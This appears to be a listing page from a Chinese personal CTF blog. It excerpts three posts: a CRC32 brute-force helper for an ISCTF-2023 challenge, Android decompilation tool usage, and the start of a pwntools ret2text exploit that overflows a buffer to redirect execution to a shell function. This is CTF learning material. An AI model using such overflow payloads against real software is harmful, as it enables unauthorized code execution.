LUO 一个兴趣使然的人与他兴趣使然的博客

📂CTF

博主
Mingyi
9月前
Powered by PythonDesigned by CHAT-GPT-4.0-1106背景ISCTF-2023 [Misc-Ez_crc] 解题一般来说的 crc32 爆破加密 txt 文件只会让爆破几个(一般 < 10)但这道题给的压缩包有200+个加密txt文档因为文件较多如果使用流传较广的脚本进行爆破的话可能会出现输出的索引问题 例如:本该是1- 2- 3- ······ 1000-可能变成1- 2- 3- ······ 10- 100-即爆破出的文本的位置和他本来应该在的位置不同所以拷打了 GPT-4.0 写了这个脚本 优势有正确排序的爆破输出可能快一点的爆破速度可一键支持
评论0 CTF Misc Tools
博主
Mingyi
9月前
博主
Mingyi
10月前
工具List & 说明apktool (.apk→.smali)一款将 apk 文件反编译(好像是)的工具使用方法.\apktool_2.9.0.jar d -s XXX.apk运行后可以得到 XXX 命名的文件夹 , 其中包含工具从 XXX.apk 整出来的神奇文件dex2jar (.dex→.jar)dex2jar 工具主要是将 dex 文件转换为包含 class 文件的 jar 文件。使用方法d2j-dex2jar.bat classes.dex运行后可得到 classes-dex2jar.jar 文件JD-GUI(查看.jar文件的图形化工具 )JD-GUI 工具是针对从dex 转为j
评论0
博主
Mingyi
10月前
[ret2text]#!/usr/bin/python3 # import pwn 工具包 (pwntools) from pwn import * # 将pwn1程序启动为进程 p = process('./pkmon') # 构建payload,flat是将列表中的元素给组合起来 # "A" * 0x10 这个是vuln函数缓冲区大小 # p64(0xdeadbeef)表示8字节的整数,用来覆盖rbp,这个值可以任意填 # p64(0x400686)返回地址,返回到get_shell函数开头 payload = flat([b'a'*10, p64(0xdeadb
评论0 CTF Pwn
博主
Mingyi
10月前